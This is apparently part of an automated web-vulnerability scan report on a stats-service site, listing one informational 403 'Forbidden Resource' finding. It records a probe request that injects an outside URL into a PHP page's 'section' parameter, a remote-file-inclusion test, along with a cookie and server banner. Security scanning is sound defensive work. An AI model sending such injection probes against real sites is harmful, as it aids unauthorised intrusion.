align="center"> <table width="780" height="27" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="20" colspan="3" valign="middle" class="box_title" td><div align="left"><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><strong><a href="http://www.growstats.com/index.php" class="top_menu">Home</a></strong></span></font></span><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/howitworks.php" class="top_menu">How It Works</a></span></font><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/services.php" class="top_menu">Services</a></span></font></span></strong><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><strong><span class="font4"><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://growstats.com/order" class="top_menu"><strong>Order Now</strong></a></span></font></span></span></strong></span></strong><strong><span class="font4"><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/testimonials.php" class="top_menu">Testimonials</a></span></font></span></strong></span></strong></span></strong><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font si..
Forbidden Resource

Forbidden Resource
1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /order/help.php

/order/help.php CONFIRMED

http://growstats.com/order/help.php?section=http://www.netsparker.com?&username=Smith&email=netspark..

Parameters

Parameter Type Value
section GET http://www.netsparker.com?
username GET Smith
email GET netsparker@example.com

Request

GET /order/help.php?section=http://www.netsparker.com?&username=Smith&email=netsparker@example.com HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: growstats.com
Cookie: xid=31d8bb09bf9f72ce2494631e6747340b; store_language=en
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Mon, 20 Jun 2011 11:22:49 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 478
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /order/help.phpon this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at growstats.com Port 80</address></body></html>